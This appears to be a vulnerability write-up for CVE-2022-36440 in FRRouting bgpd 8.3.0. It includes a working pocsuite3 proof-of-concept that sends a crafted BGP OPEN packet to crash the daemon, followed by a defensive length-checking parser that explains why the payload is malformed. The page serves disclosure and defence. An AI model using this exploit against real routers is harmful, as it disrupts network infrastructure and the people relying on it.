CVE-2022-36440 is a denial-of-service vulnerability affecting FRRouting frr-bgpd 8.3.0. The flaw lies in the peek_for_as4_capability function: an attacker can craft a malicious BGP OPEN packet and send it to a BGP peer running frr-bgpd, causing a denial of service.
By sending such a specially crafted BGP OPEN packet to an affected BGP peer, an attacker triggers a reachable assertion failure that makes the target device crash or stop responding, resulting in a denial of service (DoS).
Request example:
from pocsuite3.api import POCBase, Output, register_poc, logger
import socket


class FRRoutingBGPDOSPOC(POCBase):
    vulID = "CVE-2022-36440"
    version = "1.0"
    author = ['xzh', 'tzh00203']
    vulDate = "2022-08-17"
    createDate = "2024-12-24"
    updateDate = "2024-12-24"
    references = ["https://nvd.nist.gov/vuln/detail/CVE-2022-36440"]
    name = "FRRouting bgpd Reachable Assertion DoS Vulnerability"
    appPowerLink = "https://frrouting.org/"
    appName = "FRRouting"
    appVersion = "8.3.0"
    vulType = "Denial of Service"
    desc = "A reachable assertion was found in FRRouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP OPEN packets and send them to BGP peers running frr-bgpd, resulting in a denial of service."

    def _verify(self):
        result = {}
        # Crafted BGP OPEN: 16-byte marker, length 0x22 (34), type 1 (OPEN), version 4,
        # AS 2, hold time 5, identifier 172.17.0.1, then length bytes announcing
        # optional parameters that the remaining five bytes do not actually contain.
        payload = b'\xff' * 16 + b'\x00\x22\x01\x04\x00\x02\x00\x05\xac\x11\x00\x01\xff\xff\x00\x02\x00\x00'
        # The target is given as ip[:port]; BGP listens on TCP/179 by default.
        target_ip = self.target.split(':')[0]
        target_port = int(self.target.split(':')[1]) if ':' in self.target else 179
        try:
            logger.info(f"Connecting to {target_ip}:{target_port}...")
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((target_ip, target_port))
            # Consume whatever the peer sends first (normally its own OPEN).
            sock.recv(1024)
            # Send the crafted OPEN and wait for the peer's reaction.
            sock.sendall(payload)
            response = sock.recv(4096)
            sock.close()
            # An empty read means the peer closed the connection, i.e. bgpd went down.
            if response == b'':
                result["VerifyInfo"] = {
                    "URL": self.target,
                }
        except Exception as e:
            logger.error(f"Connection failed: {e}")
        return self.parse_output(result)

    def _attack(self):
        return self._verify()


register_poc(FRRoutingBGPDOSPOC)
# Build the malicious BGP OPEN packet and send it to the target
pocsuite -u target_ip:port -r CVE_poc
With the code above, an attacker sends the specially crafted BGP OPEN packet to the target device, triggers the assertion failure, and thereby causes a denial of service.
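The defensive counterpart to this bug is a BGP OPEN parser that checks every length field against the bytes actually present before it reads anything. The Python below is added here as an illustration; it is neither the page's PoC nor FRRouting's code. It validates the header, the fixed OPEN fields and the optional-parameters area (honouring RFC 9072's extended length encoding, so that a 255 in the length byte is not misread as a plain length), and it shows at which step the page's payload fails. The names check_bgp_open, build_open, OpenCheck and PAGE_PAYLOAD are my own; PAGE_PAYLOAD is the byte string from the PoC above, and the well-formed OPEN is constructed inline.

```python
import struct
from dataclasses import dataclass, field

BGP_MARKER = b"\xff" * 16
BGP_HEADER_LEN = 19          # 16-byte marker + 2-byte length + 1-byte type
BGP_MAX_MSG_LEN = 4096
BGP_TYPE_OPEN = 1
BGP_OPEN_MIN_LEN = 29        # header + version(1) + AS(2) + hold(2) + id(4) + opt-len(1)
NON_EXT_OPT_LEN = 255        # RFC 9072: real length follows in a 2-byte field

# Byte string from the page's PoC, reproduced so the parser can be run against it.
PAGE_PAYLOAD = BGP_MARKER + b"\x00\x22\x01\x04\x00\x02\x00\x05\xac\x11\x00\x01\xff\xff\x00\x02\x00\x00"


@dataclass
class OpenCheck:
    ok: bool
    reason: str
    my_as: int = 0
    hold_time: int = 0
    params: list = field(default_factory=list)   # (type, value) pairs


def check_bgp_open(msg: bytes) -> OpenCheck:
    """Validate every length field of a BGP OPEN against the bytes actually present.

    Each field is bounds-checked before it is read, so a lying length byte can
    never push a read past the end of the message.
    """
    if len(msg) < BGP_HEADER_LEN:
        return OpenCheck(False, "message shorter than the 19-byte BGP header")
    if msg[:16] != BGP_MARKER:
        return OpenCheck(False, "bad marker")
    length, mtype = struct.unpack("!HB", msg[16:19])
    if mtype != BGP_TYPE_OPEN:
        return OpenCheck(False, f"not an OPEN (type {mtype})")
    if length < BGP_OPEN_MIN_LEN or length > BGP_MAX_MSG_LEN:
        return OpenCheck(False, f"declared length {length} outside OPEN bounds")
    if len(msg) != length:
        return OpenCheck(False, f"declared length {length} but {len(msg)} bytes received")

    version, my_as, hold_time = struct.unpack("!BHH", msg[19:24])
    if version != 4:
        return OpenCheck(False, f"unsupported BGP version {version}")
    opt_len = msg[28]
    pos = 29
    extended = False
    if opt_len == NON_EXT_OPT_LEN:
        # RFC 9072 escape: a type byte of 255, then a 2-byte optional-parameters length.
        if length - pos < 3 or msg[pos] != 0xFF:
            return OpenCheck(False, "extended optional-parameter escape without a valid 3-byte header")
        opt_len = struct.unpack("!H", msg[pos + 1:pos + 3])[0]
        pos += 3
        extended = True

    end = pos + opt_len
    if end > length:
        return OpenCheck(False, f"optional parameters claim {opt_len} bytes but only {length - pos} remain")
    if end < length:
        return OpenCheck(False, f"{length - end} trailing bytes after optional parameters")

    params = []
    hdr = 3 if extended else 2   # type byte + 2-byte (RFC 9072) or 1-byte (RFC 4271) length
    while pos < end:
        if end - pos < hdr:
            return OpenCheck(False, f"parameter header truncated at offset {pos}")
        ptype = msg[pos]
        plen = struct.unpack("!H", msg[pos + 1:pos + 3])[0] if extended else msg[pos + 1]
        pos += hdr
        if pos + plen > end:
            return OpenCheck(False, f"parameter type {ptype} claims {plen} bytes past the end of the message")
        params.append((ptype, msg[pos:pos + plen]))
        pos += plen
    return OpenCheck(True, "well-formed", my_as, hold_time, params)


def build_open(my_as: int, hold_time: int, bgp_id: bytes, params) -> bytes:
    """Encode a classic (RFC 4271) OPEN; used here only to construct a well-formed sample."""
    body = b"".join(bytes((ptype, len(value))) + value for ptype, value in params)
    fixed = struct.pack("!BHH4sB", 4, my_as, hold_time, bgp_id, len(body))
    length = BGP_HEADER_LEN + len(fixed) + len(body)
    return BGP_MARKER + struct.pack("!HB", length, BGP_TYPE_OPEN) + fixed + body


# Constructed sample: AS 65000, hold time 90, router ID 10.0.0.1, one Capabilities
# parameter (type 2) carrying a 4-octet-AS capability (code 65, length 4).
CAP_4BYTE_AS = b"\x41\x04" + struct.pack("!I", 65000)
GOOD_OPEN = build_open(65000, 90, b"\x0a\x00\x00\x01", [(2, CAP_4BYTE_AS)])

if __name__ == "__main__":
    for name, msg in (("constructed OPEN", GOOD_OPEN), ("page payload", PAGE_PAYLOAD)):
        r = check_bgp_open(msg)
        print(f"{name}: {'accept' if r.ok else 'reject'} ({r.reason})")
```

Run stand-alone, the constructed OPEN is accepted and the page's payload is rejected: its length byte 0xff selects the extended encoding, the 2-byte extended length (2) fits, but the first parameter header inside it would need 3 bytes where only 2 remain. A parser that checks this before reading returns an error; one that reads first and asserts afterwards has exactly the failure mode the advisory describes.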
Note: to verify whether a target device has this DoS vulnerability, test only against a lab machine in a locally controlled environment.
📝 Author: tzh00203 📧 Email: tian-zh24@mails.tsinghua.edu.cn 🏫 Affiliation: Tsinghua Uni. NISL 📅 Last updated: 2025-08-04